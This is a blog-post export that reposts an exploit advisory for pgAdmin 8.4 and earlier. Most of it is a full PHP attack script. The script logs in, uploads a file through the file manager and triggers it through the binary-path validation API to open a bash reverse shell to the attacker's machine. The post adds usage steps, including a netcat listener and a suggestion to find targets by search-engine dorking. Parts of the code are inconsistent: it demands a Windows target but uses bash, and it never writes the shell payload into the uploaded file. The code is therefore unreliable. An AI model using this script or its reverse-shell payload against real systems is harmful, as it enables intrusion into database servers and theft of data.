=============================================================================================================================================
| # Title : pgAdmin 8.4 PHP Code Execution Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 129.0.1 (64 bits) |
| # Vendor : https:\/\/www.pgadmin.org\/download\/ |
=============================================================================================================================================<\/p>\n
poc :<\/p>\n[+] Dorking \u0130n Google Or Other Search Enggine.<\/p>\n[+] pgAdmin versions 8.4 and earlier are affected by a remote reverse connection execution vulnerability via the binary path validation API.
This vulnerability allows an attacker to execute a reverse connection on the server hosting PGAdmin, posing a severe risk to the integrity
of the database management system and the security of the underlying data.<\/p>\n[+] Description:<\/p>\n
The generateReverseShell function: Generates a reverse connection payload that uses netcat (or equivalent) to open a reverse connection with your machine. You will need to replace “YOUR_IP” and “YOUR_PORT” with your machine’s IP address and the port you are listening on.<\/p>\n
exec in PHP: Runs the command that opens a reverse connection using bash and executes it on the target.<\/p>\n[+] How to use it:<\/p>\n
Modify “YOUR_IP” and “YOUR_PORT” in the generateReverseShell function to match your machine.<\/p>\n
Verify that your machine is listening on the specified port using nc or a similar tool:<\/p>\n
nc -lvnp YOUR_PORT<\/p>\n[+] Run the code. If the exploit is successful, you will get a reverse connection to the target machine.<\/p>\n[+] Line : 156+157<\/p>\n
$ip = ‘YOUR_IP’; \/\/ Replace with your machine’s IP
$port = ‘YOUR_PORT’; \/\/ Replace with the port you want to use<\/p>\n[+] Line : 164+165+166<\/p>\n
$targetUrl = ‘http:\/\/target-url.com’; \/\/ Replace this with the actual address
$username = ‘admin’; \/\/ Username (if required)
$password = ‘password’; \/\/ Password (if required)<\/p>\n[+] Save As poc.php<\/p>\n[+] usage : cmd=> php poc.php<\/p>\n[+] payload :<\/p>\n
<?php<\/p>\n
class PGAdminExploit {
private $targetUrl;
private $csrfToken;
private $username;
private $password;<\/p>\n
public function __construct($targetUrl, $username = ”, $password = ”) {
$this->targetUrl = rtrim($targetUrl, ‘\/’);
$this->username = $username;
$this->password = $password;
}<\/p>\n
public function exploit() {
if ($this->authRequired() && (!$this->username || !$this->password)) {
die(“The application requires authentication, please provide valid credentials.\\n”);
}<\/p>\n
if ($this->authRequired()) {
$this->authenticate();
echo “Successfully authenticated to pgAdmin\\n”;
}<\/p>\n
if (!$this->onWindows()) {
die(“This exploit is specific to Windows targets!\\n”);
}<\/p>\n
$fileName = ‘reverse_shell.php’;
$this->fileManagerUploadAndTrigger($fileName, $this->generateReverseShell());
}<\/p>\n
private function authRequired() {
$res = $this->sendRequest(‘GET’, $this->targetUrl . ‘\/’);
return strpos($res, ‘Location: login’) !== false;
}<\/p>\n
private function onWindows() {
$res = $this->sendRequest(‘GET’, $this->targetUrl . ‘\/browser\/js\/utils.js’);
if ($res) {
$platform = $this->getStringBetween($res, “pgAdmin[‘platform’] = ‘”, “‘;”);
return $platform == ‘win32’;
}
return false;
}<\/p>\n
private function authenticate() {
$loginPage = $this->sendRequest(‘GET’, $this->targetUrl . ‘\/login’);
$this->setCsrfTokenFromLoginPage($loginPage);<\/p>\n
$res = $this->sendRequest(‘POST’, $this->targetUrl . ‘\/authenticate\/login’, [
‘csrf_token’ => $this->csrfToken,
’email’ => $this->username,
‘password’ => $this->password,
‘language’ => ‘en’,
‘internal_button’ => ‘Login’
]);<\/p>\n
if (strpos($res, ‘Location: login’) !== false) {
die(“Failed to authenticate to pgAdmin\\n”);
}
}<\/p>\n
private function setCsrfTokenFromLoginPage($response) {
if (preg_match(‘\/csrfToken”: “([\\w+.-]+)”\/’, $response, $matches)) {
$this->csrfToken = $matches[1];
} elseif (preg_match(‘\/<input.*?id=”csrf_token”.*?value=”(.*?)”\/’, $response, $matches)) {
$this->csrfToken = $matches[1];
} else {
die(“Failed to obtain the CSRF token\\n”);
}
}<\/p>\n
private function fileManagerUploadAndTrigger($filePath, $fileContents) {
list($transId, $homeFolder) = $this->fileManagerInit();<\/p>\n
$formData = [
‘newfile’ => new CURLFile($filePath, ‘application\/octet-stream’, $filePath),
‘mode’ => ‘add’,
‘currentpath’ => $homeFolder,
‘storage_folder’ => ‘my_storage’
];<\/p>\n
$res = $this->sendRequest(‘POST’, $this->targetUrl . “\/file_manager\/filemanager\/{$transId}\/”, $formData, true);<\/p>\n
if (strpos($res, ‘”success”:1’) === false) {
die(“Failed to upload file contents\\n”);
}<\/p>\n
$uploadPath = $this->getStringBetween($res, ‘”Name”:”‘, ‘”‘);
echo “Payload uploaded to: {$uploadPath}\\n”;<\/p>\n
$this->sendRequest(‘POST’, $this->targetUrl . ‘\/misc\/validate_binary_path’, json_encode([
‘utility_path’ => substr($uploadPath, 0, -15)
]), true);
}<\/p>\n
private function fileManagerInit() {
$res = $this->sendRequest(‘POST’, $this->targetUrl . ‘\/file_manager\/init’, json_encode([
‘dialog_type’ => ‘storage_dialog’,
‘supported_types’ => [‘sql’, ‘csv’, ‘json’, ‘*’],
‘dialog_title’ => ‘Storage Manager’
]));<\/p>\n
$transId = $this->getStringBetween($res, ‘”transId”:”‘, ‘”‘);
$homeFolder = $this->getStringBetween($res, ‘”homedir”:”‘, ‘”‘);<\/p>\n
if (!$transId || !$homeFolder) {
die(“Failed to initialize a file manager transaction Id or home folder\\n”);
}<\/p>\n
return [$transId, $homeFolder];
}<\/p>\n
private function sendRequest($method, $url, $data = [], $multipart = false) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);<\/p>\n
if ($method == ‘POST’) {
curl_setopt($ch, CURLOPT_POST, true);
if ($multipart) {
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
} else {
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
}
}<\/p>\n
if ($this->csrfToken) {
curl_setopt($ch, CURLOPT_HTTPHEADER, [
“X-pgA-CSRFToken: {$this->csrfToken}”
]);
}<\/p>\n
$response = curl_exec($ch);
if (curl_errno($ch)) {
die(“cURL Error: ” . curl_error($ch) . “\\n”);
}<\/p>\n
curl_close($ch);
return $response;
}<\/p>\n
private function getStringBetween($string, $start, $end) {
$string = ‘ ‘ . $string;
$ini = strpos($string, $start);
if ($ini == 0) return ”;
$ini += strlen($start);
$len = strpos($string, $end, $ini) – $ini;
return substr($string, $ini, $len);
}<\/p>\n
private function generateReverseShell() {
\/\/ \u062d\u0645\u0648\u0644\u0629 \u0627\u0644\u0627\u062a\u0635\u0627\u0644 \u0627\u0644\u0639\u0643\u0633\u064a \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 Netcat
$ip = ‘YOUR_IP’; \/\/ \u0627\u0633\u062a\u0628\u062f\u0644 \u0628\u0640 IP \u0627\u0644\u062e\u0627\u0635 \u0628\u062c\u0647\u0627\u0632\u0643
$port = ‘YOUR_PORT’; \/\/ \u0627\u0633\u062a\u0628\u062f\u0644 \u0628\u0627\u0644\u0645\u0646\u0641\u0630 \u0627\u0644\u0630\u064a \u062a\u0631\u064a\u062f \u0627\u0633\u062a\u062e\u062f\u0627\u0645\u0647
$shell = “<?php exec(\\”\/bin\/bash -c ‘bash -i > \/dev\/tcp\/$ip\/$port 0>&1’\\”); ?>”;
return $shell;
}
}<\/p>\n
\/\/ \u0645\u062b\u0627\u0644 \u0639\u0644\u0649 \u0627\u0644\u0627\u0633\u062a\u062e\u062f\u0627\u0645
$targetUrl = ‘http:\/\/target-url.com’; \/\/ \u0627\u0633\u062a\u0628\u062f\u0644 \u0647\u0630\u0627 \u0628\u0627\u0644\u0639\u0646\u0648\u0627\u0646 \u0627\u0644\u062d\u0642\u064a\u0642\u064a
$username = ‘admin’; \/\/ \u0627\u0633\u0645 \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645 (\u0625\u0630\u0627 \u0643\u0627\u0646 \u0645\u0637\u0644\u0648\u0628\u064b\u0627)
$password = ‘password’; \/\/ \u0643\u0644\u0645\u0629 \u0627\u0644\u0645\u0631\u0648\u0631 (\u0625\u0630\u0627 \u0643\u0627\u0646\u062a \u0645\u0637\u0644\u0648\u0628\u0629)<\/p>\n
$exploit = new PGAdminExploit($targetUrl, $username, $password);
$exploit->exploit();<\/p>\n
?><\/p>\n
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================<\/p>\n","protected":false},"excerpt":{"rendered":"
=============================================================================================================================================| # Title : pgAdmin 8.4 PHP Code Execution Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 129.0.1 (64 bits) || # Vendor : https:\/\/www.pgadmin.org\/download\/ |============================================================================================================================================= poc : [+] Dorking \u0130n Google Or Other Search Enggine. [+] pgAdmin versions 8.4 and earlier are affected …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59393","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59393","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59393"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59393\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59393"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59393"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59393"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}